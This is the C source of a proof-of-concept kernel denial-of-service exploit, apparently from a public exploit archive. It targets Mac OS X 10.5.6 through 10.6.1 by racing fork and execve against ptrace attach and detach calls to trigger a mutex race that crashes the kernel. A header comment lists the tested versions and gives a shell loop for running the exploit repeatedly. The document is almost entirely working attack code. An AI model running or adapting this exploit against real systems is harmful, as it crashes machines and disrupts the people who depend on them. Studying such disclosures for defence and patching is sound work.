/*
Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS
==================================================
This code should be run in a loop and due to problems
with mutex handling in ptrace a DoS can occur when a
destroyed mutex is attempted to be interlocked by OSX
kernel giving rise to a race condition. You may need
to run this code multiple times.
- Tested against 10.5.6
- Tested against 10.5.7
- Tested against 10.6.1
while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
-- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
int main(){
pid_t pid;
char *argv[] = {"id","","",0};
char *envp[] = {"",0};
pid = fork();
if(pid == 0){
usleep(100);
execve("/usr/bin/id",argv,envp);
}
else{
usleep(820);
if(ptrace(PT_ATTACH,pid,0,0)==0){
printf("[ PID: %d has been caught!\n",pid);
if(ptrace(PT_DETACH,pid,0,0)<0){
perror("Evil happens.");
}
usleep(1);
wait(0);
}
else{
perror("Fail!");
}
}
return(0);
}
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